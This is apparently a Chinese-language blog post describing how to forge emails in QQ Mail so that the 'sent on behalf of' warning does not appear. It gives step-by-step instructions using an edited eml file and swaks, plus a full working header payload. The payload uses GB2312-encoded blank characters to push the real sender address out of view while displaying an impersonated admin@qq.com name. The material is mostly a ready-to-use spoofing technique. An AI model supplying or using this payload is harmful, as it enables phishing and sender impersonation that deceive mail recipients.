QQ信箱伪造邮件
spf
绕过方法
效果图如下
屏幕截图 2021-10-24 203501.jpg
实际上跟spf没啥关系),试过的会知道,伪造发送者和接受者都没啥难度,但是如果真实的发送者(sender)与显示在邮件中的发送者(header.from)不一样的话,会提示由sender代发。以下为效果
屏幕截图 2021-10-24 203702.jpg
上面的header.from和sender对应于发邮件时的eml格式文件,header.from对应From。
但对于tx邮箱来说,只要header.from中有sender中的地址,就不会提示有代发,然后就是想办法把sender中的地址从sender中消除了,至少不能显示在sender界面中,要不然就没啥可伪造的了。
这里的绕过方法是通过字符集中的空白字符绕过,值得注意的是,我找到的payload使用的是gb2312字符集,而我使用utf-8或者gbk字符集都不能绕过去。
所以我们就要使发送的eml格式文件中的From带有我们真实的发送地址
步骤如下:
- 发送一份邮件给自己,可以事先把内容先伪造好
- 保存该邮件内容为eml格式
- 删除from前的所有内容
- 修改from为payload
- swaks重新发送邮件给目标
payload:
=?gb2312?B?udzA7dSxIDxhZG1pbkBxcS5jb20+0aGhoaGhoaGhoaGhoaGhoaGhoaGhoQ==?=
=?gb2312?B?oaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGh?=
=?gb2312?B?oaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGh?=
=?gb2312?B?oaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGh?=
=?gb2312?B?oaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGh?=
=?gb2312?B?oaGhoaGhoaGhoaGhoaGhoaGhoaGhoSAgICAgICAgICAgICAgICAgIKGkoaQ=?=
=?gb2312?B?oaQgICAgICAgICAgICAgICAgIKGhICAgICAgIKGkoaShpA==?= <admin@test.com>
admin@test.com替换发送邮件的地址
这个格式=?gb2312?B?oaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGh?=
对应=?字符集?加密方式?加密字符串?=
而上面那段就是空白字符。每一段都会使得地址往后延最后超过长度。